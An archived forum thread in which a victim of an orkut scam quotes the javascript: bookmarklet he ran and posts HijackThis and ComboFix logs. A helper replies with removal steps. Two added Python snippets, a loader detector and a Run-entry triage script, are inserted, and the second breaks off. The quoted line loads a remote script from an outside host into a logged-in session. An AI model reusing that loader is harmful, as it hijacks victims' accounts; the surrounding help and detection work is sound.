
Archived

This topic has been archived and is closed to new replies.

AndersonDutra

[Solved!] Possible virus from the new orkut

Recommended Posts

In an orkut community there were some instructions on how to access the new orkut. At the time I thought it was a virus, but there were several comments saying it had worked. So I decided to run the script, similar to this one:

 

 

javascript:w=document; y=w.createElement('script'); w.body.appendChild(y); y.src='ht'+'tp://hipertools.net/ConvitesOrkut.js';void(0);

 

Then a message appeared and that was it! So I decided to change my email and orkut passwords to be safe!! And from a quick search I heard that this really is a virus. I ended up falling for the scam out of curiosity. So I came here to ask you to analyze my log:

 

Logfile of Trend Micro HijackThis v2.0.2

Scan saved at 14:54:13, on 13/11/2009

Platform: Windows XP SP3 (WinNT 5.01.2600)

MSIE: Internet Explorer v6.00 SP3 (6.00.2900.5512)

Boot mode: Normal

 

Running processes:

C:\WINDOWS\System32\smss.exe

C:\WINDOWS\system32\winlogon.exe

C:\WINDOWS\system32\services.exe

C:\WINDOWS\system32\lsass.exe

C:\WINDOWS\system32\svchost.exe

C:\WINDOWS\System32\svchost.exe

C:\Arquivos de programas\Alwil Software\Avast4\aswUpdSv.exe

C:\Arquivos de programas\Alwil Software\Avast4\ashServ.exe

C:\WINDOWS\Explorer.EXE

C:\Arquivos de programas\Intel\AMT\atchk.exe

C:\Arquivos de programas\CyberLink\PowerDVD\PDVDServ.exe

C:\Arquivos de programas\Java\jre6\bin\jusched.exe

C:\Arquivos de programas\Analog Devices\Core\smax4pnp.exe

C:\WINDOWS\system32\hkcmd.exe

C:\WINDOWS\system32\igfxpers.exe

C:\WINDOWS\system32\igfxsrvc.exe

C:\WINDOWS\system32\spoolsv.exe

C:\ARQUIV~1\ALWILS~1\Avast4\ashDisp.exe

C:\WINDOWS\system32\ctfmon.exe

C:\Arquivos de programas\Windows Live\Messenger\MsnMsgr.Exe

C:\Arquivos de programas\Skype\Phone\Skype.exe

C:\Arquivos de programas\Messenger\msmsgs.exe

C:\Arquivos de programas\Intel\AMT\atchksrv.exe

C:\Arquivos de programas\Java\jre6\bin\jqs.exe

C:\Arquivos de programas\Intel\AMT\LMS.exe

C:\MATLAB7\webserver\bin\win32\matlabserver.exe

C:\Arquivos de programas\Intel\AMT\UNS.exe

C:\Arquivos de programas\Alwil Software\Avast4\ashMaiSv.exe

C:\Arquivos de programas\Alwil Software\Avast4\ashWebSv.exe

C:\Arquivos de programas\Windows Live\Contacts\wlcomm.exe

C:\WINDOWS\system32\wuauclt.exe

C:\Arquivos de programas\Last.fm\LastFM.exe

C:\Hijack\HiJackThis.exe

 

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://search.live.com/sphome.aspx

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://search.live.com

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157

R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://search.live.com/sphome.aspx

O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Arquivos de programas\Arquivos comuns\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll

O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)

O2 - BHO: Auxiliar de Conexão do Windows Live - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Arquivos de programas\Arquivos comuns\Microsoft Shared\Windows Live\WindowsLiveLogin.dll

O2 - BHO: Java Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Arquivos de programas\Java\jre6\bin\jp2ssv.dll

O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Arquivos de programas\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll

O4 - HKLM\..\Run: [atchk] "C:\Arquivos de programas\Intel\AMT\atchk.exe"

O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe

O4 - HKLM\..\Run: [RemoteControl] "C:\Arquivos de programas\CyberLink\PowerDVD\PDVDServ.exe"

O4 - HKLM\..\Run: [sunJavaUpdateSched] "C:\Arquivos de programas\Java\jre6\bin\jusched.exe"

O4 - HKLM\..\Run: [soundMAXPnP] C:\Arquivos de programas\Analog Devices\Core\smax4pnp.exe

O4 - HKLM\..\Run: [igfxTray] C:\WINDOWS\system32\igfxtray.exe

O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe

O4 - HKLM\..\Run: [Persistence] C:\WINDOWS\system32\igfxpers.exe

O4 - HKLM\..\Run: [Windows Defender] VSFPNC

O4 - HKLM\..\Run: [avast!] C:\ARQUIV~1\ALWILS~1\Avast4\ashDisp.exe

O4 - HKLM\..\Run: [Windows Update SP8] C:\WINDOWS\system32\Windows UpdateSP8.exe

O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Arquivos de programas\Adobe\Reader 9.0\Reader\Reader_sl.exe"

O4 - HKLM\..\Run: [Adobe ARM] "C:\Arquivos de programas\Arquivos comuns\Adobe\ARM\1.0\AdobeARM.exe"

O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe

O4 - HKCU\..\Run: [MsnMsgr] "C:\Arquivos de programas\Windows Live\Messenger\MsnMsgr.Exe" /background

O4 - HKCU\..\Run: [skype] "C:\Arquivos de programas\Skype\Phone\Skype.exe" /nosplash /minimized

O4 - HKCU\..\Run: [MSMSGS] "C:\Arquivos de programas\Messenger\msmsgs.exe" /background

O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'LOCAL SERVICE')

O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'NETWORK SERVICE')

O4 - HKUS\S-1-5-21-2052111302-1659004503-839522115-1004\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'postgres')

O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')

O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')

O8 - Extra context menu item: E&xportar para o Microsoft Excel - res://C:\ARQUIV~1\MICROS~2\OFFICE11\EXCEL.EXE/3000

O9 - Extra button: Pesquisar - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\ARQUIV~1\MICROS~2\OFFICE11\REFIEBAR.DLL

O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe

O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe

O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Arquivos de programas\Messenger\msmsgs.exe

O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Arquivos de programas\Messenger\msmsgs.exe

O14 - IERESET.INF: SEARCH_PAGE_URL=&http://home.microsoft.com/intl/br/access/allinone.asp

O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1235056171250

O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

O17 - HKLM\System\CCS\Services\Tcpip\..\{193A9405-D997-4DAC-9140-CBF971D269BF}: NameServer = 150.163.28.5,150.163.105.9

O17 - HKLM\System\CS1\Services\Tcpip\..\{193A9405-D997-4DAC-9140-CBF971D269BF}: NameServer = 150.163.28.5,150.163.105.9

O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Arquivos de programas\Alwil Software\Avast4\aswUpdSv.exe

O23 - Service: Intel® Active Management Technology System Status Service (atchksrv) - Intel Corporation - C:\Arquivos de programas\Intel\AMT\atchksrv.exe

O23 - Service: avast! Antivirus - ALWIL Software - C:\Arquivos de programas\Alwil Software\Avast4\ashServ.exe

O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Arquivos de programas\Alwil Software\Avast4\ashMaiSv.exe

O23 - Service: avast! Web Scanner - ALWIL Software - C:\Arquivos de programas\Alwil Software\Avast4\ashWebSv.exe

O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Arquivos de programas\Java\jre6\bin\jqs.exe

O23 - Service: Intel® Active Management Technology Local Management Service (LMS) - Intel - C:\Arquivos de programas\Intel\AMT\LMS.exe

O23 - Service: MATLAB Server (matlabserver) - Unknown owner - C:\MATLAB7\webserver\bin\win32\matlabserver.exe

O23 - Service: PostgreSQL Database Server 8.3 (pgsql-8.3) - PostgreSQL Global Development Group - C:\Arquivos de programas\PostgreSQL\8.3\bin\pg_ctl.exe

O23 - Service: Intel® Active Management Technology User Notification Service (UNS) - Intel - C:\Arquivos de programas\Intel\AMT\UNS.exe

 

--

End of file - 7374 bytes
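What the pasted snippet does is build a `<script>` element and point it at a remote file, splitting 'ht'+'tp' so a keyword filter on the community page would not see a URL; once pasted into the address bar it runs with the logged-in orkut session's privileges. Added example, not part of the thread: a static check a moderator or support tool could run over pasted text to flag that loader pattern. The `example.invalid` host, the sample strings and the signal list are constructed assumptions, and the text is only inspected, never executed.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# One concatenated pair of same-quoted string literals, e.g. 'ht'+'tp'.
CONCAT_RE = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*\1([^'"]*)\1""")
HOST_RE = re.compile(r"""https?://([^/'"\s;]+)""", re.I)

# Each signal: (label, pattern, what it means for the person who pasted the text).
SIGNALS = [
    ("javascript_scheme", re.compile(r"^\s*javascript:", re.I),
     "javascript: URL, so pasting it into the address bar runs code in the open site's origin"),
    ("script_injection", re.compile(r"createElement\(\s*['\"]script['\"]\s*\)", re.I),
     "creates a <script> element at runtime"),
    ("remote_src", re.compile(r"\.src\s*=", re.I),
     "points that element at another host, handing control to whoever serves the file"),
    ("split_string", CONCAT_RE,
     "assembles a string from pieces, the usual way to hide 'http' from keyword filters"),
    ("void_tail", re.compile(r"void\s*\(\s*0\s*\)"),
     "ends with void(0) so the page stays put and the victim notices nothing"),
]


@dataclass
class Verdict:
    folded: str                      # snippet with string concatenations joined
    signals: list[str] = field(default_factory=list)
    reasons: list[str] = field(default_factory=list)
    remote_hosts: list[str] = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.signals)

    @property
    def is_loader(self) -> bool:
        # These three together are what makes the text a remote-script loader.
        return {"javascript_scheme", "script_injection", "remote_src"} <= set(self.signals)


def fold_concat(text: str) -> str:
    """Join 'ht'+'tp://...' style concatenations until none remain."""
    while True:
        folded = CONCAT_RE.sub(r"\1\2\3\1", text)
        if folded == text:
            return folded
        text = folded


def assess(snippet: str) -> Verdict:
    """Static inspection only: the snippet is matched against patterns, never evaluated."""
    verdict = Verdict(folded=fold_concat(snippet))
    for label, pattern, why in SIGNALS:
        if pattern.search(snippet):
            verdict.signals.append(label)
            verdict.reasons.append(why)
    # Hosts are extracted from the folded text so the split scheme cannot hide them.
    verdict.remote_hosts = sorted(set(HOST_RE.findall(verdict.folded)))
    return verdict


# Constructed sample modelled on the snippet in the thread; the host is a placeholder.
LOADER_SAMPLE = ("javascript:w=document; y=w.createElement('script'); w.body.appendChild(y); "
                 "y.src='ht'+'tp://example.invalid/ConvitesOrkut.js';void(0);")

if __name__ == "__main__":
    for text in (LOADER_SAMPLE, "javascript:alert(document.title)", "https://www.orkut.com/Main"):
        v = assess(text)
        print(f"loader={v.is_loader} score={v.score} hosts={v.remote_hosts}")
        for reason in v.reasons:
            print("  -", reason)
```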


*Temporarily disable your antivirus

Right-click the Avast icon that runs next to the clock > select "Pause resident protection" > confirm.

*Download ComboFix and save it to the desktop

*Close Internet Explorer and Windows Explorer

*Double-click the Combofix.exe file

*Accept the license agreement

*Important: while ComboFix is running, do not use the mouse or the keyboard!! To abort the procedure press [N]

*The program will close automatically

*Paste the report created at C:\combofix.txt


Here it is!! From what I saw on orkut, I was added against my will to 3 communities!! I hope that was the only harm!!

 

ComboFix 09-11-13.06 - Anderson 13/11/2009 16:39.1.2 - NTFSx86

Microsoft Windows XP Professional 5.1.2600.3.1252.55.1046.18.2021.1362 [GMT -2:00]

Executando de: c:\documents and settings\Anderson\Desktop\ComboFix.exe

AV: avast! antivirus 4.8.1351 [VPS 091113-0] *On-access scanning disabled* (Updated) {7591DB91-41F0-48A3-B128-1A293FD8233D}

.

 

((((((((((((((((((((((((((((((((((((( Outras Exclusões )))))))))))))))))))))))))))))))))))))))))))))))))))

.

 

c:\docume~1\Anderson\CONFIG~1\Temp\1.wmv

c:\documents and settings\Anderson\Desktop\Introdução_do_HNB.wmv

c:\documents and settings\Anderson\Desktop\Introdução_do_HNB.wmv

c:\windows\WINDOWS

c:\windows\WINDOWS\SYSTEM32\LexFiles.log

c:\windows\WINDOWS\SYSTEM32\lexlog.dlL

c:\windows\WINDOWS\SYSTEM32\LMAAG2BJ.DLL

c:\windows\WINDOWS\SYSTEM32\LMAAG2TH.HLP

c:\windows\WINDOWS\SYSTEM32\Monitor.inf

 

.

(((((((((((((((( Arquivos/Ficheiros criados de 2009-10-13 to 2009-11-13 ))))))))))))))))))))))))))))

.

 

2009-11-13 16:52 . 2009-11-13 16:54 -------- d-----w- C:\Hijack

2009-11-04 12:19 . 2009-11-10 12:43 -------- d-----w- C:\Dado MArcio

2009-10-23 12:47 . 2009-10-23 12:47 -------- d-----w- c:\documents and settings\Anderson\.netbeans-registration

2009-10-23 12:47 . 2009-10-23 12:47 -------- d-----w- c:\documents and settings\Anderson\.netbeans

2009-10-23 12:46 . 2009-10-23 12:46 -------- d-----w- c:\documents and settings\Anderson\.x3deditor32E}

2009-10-23 12:45 . 2009-10-23 12:46 -------- d-----w- C:\X3D-Edit3.2

2009-10-20 13:25 . 2009-10-20 13:25 -------- d-----w- c:\arquivos de programas\Bitmanagement Software

2009-10-20 12:12 . 2009-10-20 14:07 -------- d-----w- c:\windows\SxsCaPendDel

2009-10-19 18:46 . 2009-10-19 18:46 -------- d-----w- c:\arquivos de programas\Microsoft SQL Server

2009-10-19 18:46 . 2009-10-19 18:46 112640 ----a-w- c:\documents and settings\All Users\Dados de aplicativos\Microsoft\VCExpress\9.0\1033\ResourceCache.dll

2009-10-19 18:46 . 2009-10-19 18:46 416 ----a-w- c:\documents and settings\All Users\Dados de aplicativos\Microsoft\MSDN\9.0\1033\ResourceCache.dll

2009-10-19 18:44 . 2009-10-20 12:12 -------- d-----w- c:\documents and settings\All Users\Dados de aplicativos\Microsoft Help

2009-10-19 18:44 . 2009-10-20 12:11 -------- d-----w- c:\arquivos de programas\Microsoft Visual Studio 9.0

2009-10-19 18:44 . 2009-10-19 18:44 -------- d-----w- c:\arquivos de programas\Microsoft SDKs

2009-10-19 18:43 . 2009-10-19 18:43 -------- d-----w- c:\windows\system32\XPSViewer

2009-10-19 18:43 . 2009-10-19 18:43 -------- d-----w- c:\arquivos de programas\MSBuild

2009-10-19 18:43 . 2009-10-19 18:43 -------- d-----w- c:\arquivos de programas\Reference Assemblies

2009-10-19 18:43 . 2008-07-06 12:06 89088 -c----w- c:\windows\system32\dllcache\filterpipelineprintproc.dll

2009-10-19 18:43 . 2008-07-06 12:06 575488 -c----w- c:\windows\system32\dllcache\xpsshhdr.dll

2009-10-19 18:43 . 2008-07-06 12:06 575488 ------w- c:\windows\system32\xpsshhdr.dll

2009-10-19 18:43 . 2008-07-06 12:06 1676288 -c----w- c:\windows\system32\dllcache\xpssvcs.dll

2009-10-19 18:43 . 2008-07-06 12:06 1676288 ------w- c:\windows\system32\xpssvcs.dll

2009-10-19 18:43 . 2008-07-06 12:06 117760 ------w- c:\windows\system32\prntvpt.dll

2009-10-19 18:43 . 2008-07-06 10:50 597504 -c----w- c:\windows\system32\dllcache\printfilterpipelinesvc.exe

 

.

((((((((((((((((((((((((((((((((((((( Relatório Find3M ))))))))))))))))))))))))))))))))))))))))))))))))))))

.

2009-11-13 18:21 . 2009-03-19 18:09 -------- d-----w- c:\documents and settings\Anderson\Dados de aplicativos\Skype

2009-11-13 17:15 . 2009-05-13 14:52 -------- d-----w- c:\documents and settings\Anderson\Dados de aplicativos\EditPlus 3

2009-11-11 12:58 . 2009-03-19 20:18 -------- d-----w- c:\documents and settings\Anderson\Dados de aplicativos\gtk-2.0

2009-11-05 19:45 . 2004-08-04 10:00 80246 ----a-w- c:\windows\system32\perfc016.dat

2009-11-05 19:45 . 2004-08-04 10:00 473318 ----a-w- c:\windows\system32\perfh016.dat

2009-10-21 17:45 . 2009-02-19 14:40 -------- d-----w- c:\arquivos de programas\Arquivos comuns\Adobe

2009-09-25 05:36 . 2006-03-04 03:34 669184 ----a-w- c:\windows\system32\wininet.dll

2009-09-25 05:36 . 2004-08-04 10:00 81920 ----a-w- c:\windows\system32\ieencode.dll

2009-09-11 14:19 . 2004-08-04 10:00 136192 ----a-w- c:\windows\system32\msv1_0.dll

2009-09-11 11:42 . 2009-09-11 11:42 411368 ----a-w- c:\windows\system32\deploytk.dll

2009-09-11 11:42 . 2009-09-11 11:42 152576 ----a-w- c:\documents and settings\Anderson\Dados de aplicativos\Sun\Java\jre1.6.0_15\lzma.dll

2009-09-04 21:04 . 2004-08-04 10:00 58880 ----a-w- c:\windows\system32\msasn1.dll

2009-08-26 08:01 . 2004-08-04 10:00 247326 ----a-w- c:\windows\system32\strmdll.dll

2009-08-17 16:10 . 2009-03-30 13:34 1279456 ----a-w- c:\windows\system32\aswBoot.exe

2009-08-17 16:06 . 2009-03-30 13:34 93392 ----a-w- c:\windows\system32\drivers\aswmon.sys

2009-08-17 16:06 . 2009-03-30 13:34 94160 ----a-w- c:\windows\system32\drivers\aswmon2.sys

2009-08-17 16:05 . 2009-03-30 13:34 114768 ----a-w- c:\windows\system32\drivers\aswSP.sys

2009-08-17 16:05 . 2009-03-30 13:34 20560 ----a-w- c:\windows\system32\drivers\aswFsBlk.sys

2009-08-17 16:04 . 2009-03-30 13:34 51376 ----a-w- c:\windows\system32\drivers\aswTdi.sys

2009-08-17 16:04 . 2009-03-30 13:34 23152 ----a-w- c:\windows\system32\drivers\aswRdr.sys

2009-08-17 16:03 . 2009-03-30 13:34 26944 ----a-w- c:\windows\system32\drivers\aavmker4.sys

2009-08-17 16:02 . 2009-03-30 13:34 97480 ----a-w- c:\windows\system32\AvastSS.scr

.

 

(((((((((((((((((((((((((( Pontos de Carregamento do Registro )))))))))))))))))))))))))))))))))))))))

.

.

*Nota* entradas vazias e legítimas por defeito não são mostradas.

REGEDIT4

 

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"MsnMsgr"="c:\arquivos de programas\Windows Live\Messenger\MsnMsgr.Exe" [2009-02-06 3885408]

"Skype"="c:\arquivos de programas\Skype\Phone\Skype.exe" [2009-03-11 24095528]

"MSMSGS"="c:\arquivos de programas\Messenger\msmsgs.exe" [2008-04-14 1695232]

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"Windows Defender"="VSFPNC" [X]

"atchk"="c:\arquivos de programas\Intel\AMT\atchk.exe" [2007-06-12 408344]

"NeroFilterCheck"="c:\windows\system32\NeroCheck.exe" [2001-07-09 155648]

"RemoteControl"="c:\arquivos de programas\CyberLink\PowerDVD\PDVDServ.exe" [2003-12-08 32768]

"SunJavaUpdateSched"="c:\arquivos de programas\Java\jre6\bin\jusched.exe" [2009-09-11 149280]

"SoundMAXPnP"="c:\arquivos de programas\Analog Devices\Core\smax4pnp.exe" [2007-08-01 1036288]

"IgfxTray"="c:\windows\system32\igfxtray.exe" [2008-05-29 150040]

"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2008-05-29 170520]

"Persistence"="c:\windows\system32\igfxpers.exe" [2008-05-29 141848]

"avast!"="c:\arquiv~1\ALWILS~1\Avast4\ashDisp.exe" [2009-08-17 81000]

"Adobe Reader Speed Launcher"="c:\arquivos de programas\Adobe\Reader 9.0\Reader\Reader_sl.exe" [2009-10-03 35696]

"Adobe ARM"="c:\arquivos de programas\Arquivos comuns\Adobe\ARM\1.0\AdobeARM.exe" [2009-09-04 935288]

 

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]

"CTFMON.EXE"="c:\windows\system32\CTFMON.EXE" [2008-04-14 15360]

 

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]

BootExecute REG_MULTI_SZ masterx autocheck autochk *

 

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]

"%windir%\\system32\\sessmgr.exe"=

"%windir%\\Network Diagnostic\\xpnetdiag.exe"=

"c:\\Arquivos de programas\\Windows Live\\Messenger\\wlcsdk.exe"=

"c:\\Arquivos de programas\\Windows Live\\Messenger\\msnmsgr.exe"=

"c:\\WINDOWS\\pchealth\\helpctr\\binaries\\helpctr.exe"=

"c:\\WINDOWS\\system32\\rtcshare.exe"=

"c:\\Documents and Settings\\Anderson\\Dados de aplicativos\\Macromedia\\Flash Player\\www.macromedia.com\\bin\\octoshape\\octoshape.exe"=

"c:\\Arquivos de programas\\Java\\jdk1.6.0_06\\jre\\bin\\javaw.exe"=

"c:\\Arquivos de programas\\Skype\\Phone\\Skype.exe"=

 

R1 aswSP;avast! Self Protection;c:\windows\system32\drivers\aswSP.sys [30/3/2009 11:34 114768]

R2 aswFsBlk;aswFsBlk;c:\windows\system32\drivers\aswFsBlk.sys [30/3/2009 11:34 20560]

R2 pgsql-8.3;PostgreSQL Database Server 8.3;c:\arquivos de programas\PostgreSQL\8.3\bin\pg_ctl.exe [19/9/2008 04:03 65536]

R2 UNS;Intel® Active Management Technology User Notification Service;c:\arquivos de programas\Intel\AMT\UNS.exe [19/2/2009 11:06 2521880]

 

--- =Outros Serviços/Drivers Na Memória ---

 

*NewlyCreated* - MBR

*Deregistered* - mbr

.

Conteúdo da pasta 'Tarefas Agendadas'

 

2009-11-12 c:\windows\Tasks\AppleSoftwareUpdate.job

- c:\arquivos de programas\Apple Software Update\SoftwareUpdate.exe [2008-07-30 15:34]

 

2009-11-13 c:\windows\Tasks\WGASetup.job

- c:\windows\system32\KB905474\wgasetup.exe [2009-04-28 01:18]

.

.

------- Scan Suplementar -------

.

IE: E&xportar para o Microsoft Excel - c:\arquiv~1\MICROS~2\OFFICE11\EXCEL.EXE/3000

TCP: {193A9405-D997-4DAC-9140-CBF971D269BF} = 150.163.28.5,150.163.105.9

FF - ProfilePath - c:\documents and settings\Anderson\Dados de aplicativos\Mozilla\Firefox\Profiles\e85qkk4c.default\

FF - prefs.js: browser.search.defaulturl - hxxp://search.live.com/results.aspx?FORM=IEFM1&q=

FF - prefs.js: browser.search.selectedEngine - Google

FF - prefs.js: browser.startup.homepage - hxxp://pt-BR.start2.mozilla.com/firefox?client=firefox-a&rls=org.mozilla:pt-BR:official

FF - prefs.js: keyword.URL - hxxp://search.live.com/results.aspx?FORM=IEFM1&q=

FF - plugin: c:\arquivos de programas\Bitmanagement Software\BS Contact\npBSContact.dll

FF - plugin: c:\arquivos de programas\Bitmanagement Software\BS Contact\npBSVersion_6.dll

FF - plugin: c:\arquivos de programas\Mozilla Firefox\plugins\np-mswmp.dll

FF - plugin: c:\arquivos de programas\Mozilla Firefox\plugins\npSwirl3.dll

FF - HiddenExtension: Microsoft .NET Framework Assistant: {20a82645-c095-46ed-80e3-08825760534b} - c:\windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension\

 

---- FIREFOX POLICIES ----

c:\arquivos de programas\Mozilla Firefox\defaults\pref\firefox-l10n.js - pref("browser.fixup.alternate.suffix", ".com.br");

.

- - - - ORFÃOS REMOVIDOS - - - -

 

HKLM-Run-Windows Update SP8 - c:\windows\system32\Windows UpdateSP8.exe

 

 

 

**************************************************************************

Procurando processos ocultos ...

 

Procurando entradas auto inicializáveis ocultas ...

 

Procurando ficheiros/arquivos ocultos ...

 

Varredura completada com sucesso

arquivos/ficheiros ocultos:

 

**************************************************************************

.

--------------------- CHAVES DO REGISTRO BLOQUEADAS ---------------------

 

[HKEY_LOCAL_MACHINE\software\Microsoft\Windows\CurrentVersion\Installer\UserData\LocalSystem\Components\h–€|ÿÿÿÿ¤•€|ù•6~*]

"6140110900063D11C8EF10054038389C"="C?\\WINDOWS\\system32\\FM20ENU.DLL"

.

--------------------- DLLs Carregadas Sob os Processos em Execução ---------------------

 

- - - - - - - > 'explorer.exe'(3936)

c:\windows\system32\WPDShServiceObj.dll

c:\windows\system32\PortableDeviceTypes.dll

c:\windows\system32\PortableDeviceApi.dll

.

------------------------ Outros Processos em Execução ------------------------

.

c:\arquivos de programas\Alwil Software\Avast4\aswUpdSv.exe

c:\arquivos de programas\Alwil Software\Avast4\ashServ.exe

c:\arquivos de programas\Intel\AMT\atchksrv.exe

c:\arquivos de programas\Java\jre6\bin\jqs.exe

c:\arquivos de programas\Intel\AMT\LMS.exe

c:\windows\system32\igfxsrvc.exe

c:\arquivos de programas\PostgreSQL\8.3\bin\postgres.exe

c:\arquivos de programas\PostgreSQL\8.3\bin\postgres.exe

c:\arquivos de programas\PostgreSQL\8.3\bin\postgres.exe

c:\arquivos de programas\PostgreSQL\8.3\bin\postgres.exe

c:\arquivos de programas\PostgreSQL\8.3\bin\postgres.exe

c:\arquivos de programas\PostgreSQL\8.3\bin\postgres.exe

c:\arquivos de programas\Alwil Software\Avast4\ashMaiSv.exe

c:\arquivos de programas\Alwil Software\Avast4\ashWebSv.exe

.

**************************************************************************

.

Tempo para conclusão: 2009-11-13 16:46 - Máquina reiniciou

ComboFix-quarantined-files.txt 2009-11-13 18:45

 

Pré-execução: 15 pasta(s) 40.164.474.880 bytes disponíveis

Pós execução: 19 pasta(s) 40.838.615.040 bytes disponíveis

 

WindowsXP-KB310994-SP2-Pro-BootDisk-PTG.exe

[boot loader]

timeout=2

default=multi(0)disk(0)rdisk(0)partition(2)\WINDOWS

[operating systems]

c:\cmdcons\BOOTSECT.DAT="Microsoft Windows Recovery Console" /cmdcons

multi(0)disk(0)rdisk(0)partition(2)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect

 

- - End Of File - - BE46A0BA68C6E98BBED97FF5280668DC


1.

*Run HijackThis, click [Do a system scan only], check the entry below and click [Fix checked]

O4 - HKLM\..\Run: [Windows Defender] VSFPNC

2.

*Post a new HijackThis log
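The entry the helper singles out, `[Windows Defender] VSFPNC`, has no path at all, and the one ComboFix had already removed as an orphan, `Windows UpdateSP8.exe` in system32, borrows a Microsoft product name for a binary Windows does not ship. A small triage script, added here as an example and not part of the thread, applies those observations to HijackThis O4 lines: it parses each entry, splits the command from its arguments, and reports bare tokens, space-containing executables sitting directly in system32, and product names that do not launch the product's own executable. The expected-binary table is an assumption to extend, and the sample lines are taken from the first log above.

```python
from __future__ import annotations

import ntpath
import re
from dataclasses import dataclass, field

# HijackThis O4 line: "O4 - <hive>\..\<Run key>: [<value name>] <command>"
O4_RE = re.compile(r"^O4 - (?P<hive>.+?)\\\.\.\\(?P<key>Run\w*): \[(?P<name>[^\]]+)\]\s*(?P<cmd>.*)$")
# HijackThis appends "(User 'NAME')" to HKUS entries; it is not part of the command.
USER_SUFFIX_RE = re.compile(r"\s*\(User '[^']*'\)\s*$")
# Executable part of an unquoted command (paths in this log contain spaces).
EXE_RE = re.compile(r"^(.*?\.(?:exe|com|bat|cmd|scr|pif|vbs|js|dll))(?:\s+(.*))?$", re.I)
# Heuristic (assumption): product names borrowed by malware, and the executable
# each product is actually known to register under that name.
PRODUCT_BINARIES = {
    "windows defender": {"msascui.exe"},
    "windows update": {"wuauclt.exe"},
}

@dataclass
class RunEntry:
    hive: str
    key: str
    name: str
    path: str   # executable part of the command, quotes stripped
    args: str

@dataclass
class Finding:
    entry: RunEntry
    reasons: list[str] = field(default_factory=list)

def split_command(cmd: str) -> tuple[str, str]:
    """Separate the executable path from its arguments."""
    cmd = USER_SUFFIX_RE.sub("", cmd).strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        if end > 0:
            return cmd[1:end], cmd[end + 1:].strip()
    m = EXE_RE.match(cmd)
    if m:
        return m.group(1), (m.group(2) or "").strip()
    return cmd, ""  # nothing executable-looking: the whole value is the "path"

def parse_o4(line: str) -> RunEntry | None:
    m = O4_RE.match(line.strip())
    if not m:
        return None
    path, args = split_command(m.group("cmd"))
    return RunEntry(m.group("hive"), m.group("key"), m.group("name"), path, args)

def assess(entry: RunEntry) -> list[str]:
    """Return the reasons an entry deserves a closer look (empty list = looks normal)."""
    reasons = []
    base = ntpath.basename(entry.path)
    parent = ntpath.dirname(entry.path).lower()
    if "\\" not in entry.path and "/" not in entry.path:
        reasons.append(f"value {entry.path!r} is a bare token, not a path to a file")
    if " " in base and parent.endswith("\\system32"):
        reasons.append(f"{base!r} sits directly in system32 yet has a space in its name")
    for product, binaries in PRODUCT_BINARIES.items():
        if entry.name.lower().startswith(product) and base.lower() not in binaries:
            reasons.append(f"name borrows {product!r} but launches {base!r}")
    return reasons

def triage(lines) -> list[Finding]:
    """Parse every O4 line and keep the ones with at least one reason."""
    findings = []
    for line in lines:
        entry = parse_o4(line)
        if entry and (reasons := assess(entry)):
            findings.append(Finding(entry, reasons))
    return findings

# Constructed sample: O4 entries taken from the thread's first HijackThis log.
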